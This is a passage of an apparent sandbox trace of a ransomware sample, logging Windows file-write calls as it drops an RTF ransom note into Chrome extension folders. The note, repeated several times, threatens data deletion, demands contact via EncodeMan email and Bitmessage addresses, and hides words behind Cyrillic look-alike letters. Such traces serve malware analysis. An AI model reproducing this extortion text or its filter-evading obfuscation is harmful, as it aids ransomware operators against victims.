u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nágãXà]Æál\x1a¦Ò\x9f\x9fV²Ù4z\x04àÿÏ\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0283.894] WriteFile (in: hFile=0x2b0, lpBuffer=0x235a8a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235a8a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.894] CloseHandle (hObject=0x2b0) returned 1 [0283.895] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0283.895] GetLastError () returned 0x2 [0283.895] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0284.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 